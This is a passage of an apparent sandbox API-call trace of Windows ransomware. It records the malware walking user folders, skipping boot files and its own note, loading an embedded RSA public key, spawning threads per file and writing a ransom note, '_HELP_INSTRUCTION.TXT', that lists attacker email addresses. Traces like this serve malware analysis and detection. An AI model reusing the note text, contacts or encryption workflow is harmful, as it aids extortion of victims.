returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0227.313] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0227.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1098 [0227.314] Sleep (dwMilliseconds=0x96) [0227.469] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.469] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0227.469] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0227.469] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0227.469] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="ntldr") returned 0x0 [0227.469] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="NTLDR") returned 0x0 [0227.469] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="NTDETECT.COM") returned 0x0 [0227.469] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="ntdetect.com") returned 0x0 [0227.469] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0227.469] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0227.469] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0227.469] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0227.469] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0227.469] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0227.469] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x109c [0227.470] Sleep (dwMilliseconds=0x96) [0227.625] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.625] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0227.625] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0227.625] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0227.625] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="ntldr") returned 0x0 [0227.625] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="NTLDR") returned 0x0 [0227.625] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="NTDETECT.COM") returned 0x0 [0227.625] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="ntdetect.com") returned 0x0 [0227.625] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0227.625] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0227.625] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0227.625] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0227.625] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0227.625] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0227.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10a0 [0227.626] Sleep (dwMilliseconds=0x96) [0227.781] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.781] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.781] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.781] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.781] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.781] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.781] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.781] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.781] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.781] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.781] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0227.781] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0227.782] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0227.782] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0227.782] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0227.782] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0227.782] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0227.782] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0227.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0227.782] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0227.782] SetErrorMode (uMode=0x1) returned 0x1 [0227.782] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_HELP_INSTRUCTION.TXT") returned 51 [0227.782] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0227.783] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0227.783] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0x10a4) returned 0x0 [0227.783] RegQueryValueExW (in: hKey=0x10a4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb0278, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x3cb0278*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0227.783] RegCloseKey (hKey=0x10a4) returned 0x0 [0227.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0227.783] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0227.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10a4 [0227.784] CloseHandle (hObject=0x10a4) returned 1 [0227.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3cdea18 [0227.784] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0227.784] lstrcpyW (in: lpString1=0x17d784, lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0227.784] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0227.784] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0227.784] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0227.784] SetErrorMode (uMode=0x1) returned 0x1 [0227.784] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0227.785] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" [0227.785] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" [0227.785] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" [0227.785] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0227.785] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="AppData" [0227.785] lstrcpyW (in: lpString1=0x17c6e4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0227.785] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0227.785] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" [0227.785] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="Desktop") returned 0x0 [0227.785] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpSrch="DESKTOP") returned 0x0 [0227.785] SetErrorMode (uMode=0x1) returned 0x1 [0227.785] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\_HELP_INSTRUCTION.TXT") returned 59 [0227.785] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0227.786] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0227.786] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x10a8) returned 0x0 [0227.786] RegQueryValueExW (in: hKey=0x10a8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43d34a8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43d34a8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0227.786] RegCloseKey (hKey=0x10a8) returned 0x0 [0227.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0227.786] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0227.786] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10a8 [0227.786] CloseHandle (hObject=0x10a8) returned 1 [0227.786] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0227.786] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="AppData" [0227.786] lstrcpyW (in: lpString1=0x17c6e4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0227.787] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0227.787] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0227.787] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Application Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0227.787] SetErrorMode (uMode=0x1) returned 0x1 [0227.787] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0227.787] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" [0227.787] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" [0227.787] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*" [0227.787] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0227.787] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0227.787] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0227.787] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*" [0227.787] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="Desktop") returned 0x0 [0227.787] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpSrch="DESKTOP") returned 0x0 [0227.787] SetErrorMode (uMode=0x1) returned 0x1 [0227.787] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\_HELP_INSTRUCTION.TXT") returned 68 [0227.787] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0227.788] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0227.788] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x10a8) returned 0x0 [0227.788] RegQueryValueExW (in: hKey=0x10a8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43d36d8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43d36d8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0227.788] RegCloseKey (hKey=0x10a8) returned 0x0 [0227.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0227.788] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0227.788] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10a8 [0227.788] CloseHandle (hObject=0x10a8) returned 1 [0227.788] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0227.789] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0227.789] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.789] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0227.789] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0227.789] lstrcpyW (in: 